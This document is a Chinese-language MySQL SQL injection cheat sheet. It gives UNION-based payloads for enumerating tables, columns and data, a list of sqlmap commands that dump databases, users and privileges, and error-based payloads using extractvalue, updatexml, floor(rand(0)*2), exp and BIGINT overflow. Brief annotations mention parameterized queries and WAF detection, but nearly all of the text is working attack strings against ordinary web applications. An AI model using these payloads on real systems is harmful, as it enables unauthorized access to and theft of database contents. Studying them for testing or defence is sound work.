MySQL 联合查询（UNION）注入 —— 成因是用户输入被直接拼接进 SQL 语句；改用参数化查询/预编译语句可从根本上消除此类问题
group_concat('[',version(),'][',database(),'][',@@datadir,'][',current_user(),'][',user(),'][',system_user(),'][',@@version_compile_os,']')
查询表名:
union select group_concat(table_name) from information_schema.tables where table_schema=database()
查询列名:
union select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='$table_name'
查询数据:
union select group_concat($column1,'---',$column2,'---',$column3) from $table_name
sqlmap（自动化 SQL 注入检测工具）常用命令，$url、$database_name、$table_name 等均为占位符:
sqlmap -u '$url'
sqlmap -u '$url' --dbs
sqlmap -u '$url' --current-db
sqlmap -u '$url' -D '$database_name' --tables
sqlmap -u '$url' -D '$database_name' -T '$table_name' --columns
sqlmap -u '$url' -D '$database_name' -T '$table_name' -C '$column1,$column2,$column3' --dump
sqlmap -u '$url' -f
sqlmap -u '$url' -b
sqlmap -u '$url' --is-dba
sqlmap -u '$url' --users
sqlmap -u '$url' --current-user
sqlmap -u '$url' --privileges
sqlmap -u '$url' --roles
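报错注入（依赖应用把数据库错误信息回显给客户端；防御上应关闭详细错误回显并使用参数化查询，请求参数中出现 extractvalue、updatexml、floor(rand(0)*2)、exp(~ 等特征可作为 WAF/日志检测依据）: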
extractvalue()
and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))--+
updatexml()
and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)--+
and updatexml(1,concat(0x7e,(select @@version)),1)--+
floor() 与 rand() 配合 group by（重复键报错）
union select count(*),1,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))a from information_schema.tables group by a%23
exp()（DOUBLE 溢出报错）
union select exp(~(select * from (select table_name from information_schema.tables where table_schema=database() limit 0,1)a)),2,3%23
~0（BIGINT UNSIGNED 溢出报错）
union select (!(select * from (select user())x) - ~0),2,3--+